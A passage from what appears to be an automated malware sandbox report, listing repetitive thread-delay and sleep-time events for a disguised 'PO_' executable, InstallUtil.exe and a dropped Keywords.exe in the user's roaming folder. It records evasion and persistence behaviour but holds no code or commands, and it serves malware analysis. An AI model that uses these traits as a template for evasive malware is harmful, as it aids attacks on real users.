Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596919	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596692	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594714	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594607	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599839	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599588	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599129	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Window / User API: threadDelayed 1813	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Window / User API: threadDelayed 5627	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 2119	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 7731	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Window / User API: threadDelayed 2210	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Window / User API: threadDelayed 6900	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3572	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 6244	Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7320	Thread sleep count: 1813 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7320	Thread sleep count: 5627 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -99874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -99546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -98778s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -98656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -98392s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -98223s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -98047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -97937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -97828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -97718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -97609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -97500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -97390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -97280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -97172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -97047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -96937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -96828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -96718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -96609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -96500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -96376s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -96250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -96140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -96031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -95922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -95812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe TID: 7280	Thread sleep time: -95651s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7880	Thread sleep count: 2119 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7880	Thread sleep count: 7731 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -598780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -596919s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -596692s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -596577s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -596468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -596140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -595375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -595265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -595047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -594937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -594714s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7876	Thread sleep time: -594607s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 396	Thread sleep count: 2210 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 6680	Thread sleep count: 6900 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -99843s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -99734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -99625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -99515s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -99402s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -99290s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -99171s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -99051s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -98833s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -98672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -98531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -98421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -98310s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -98203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -98093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -97984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -97875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe TID: 8176	Thread sleep time: -97765s >= -30000s	Jump to behavior
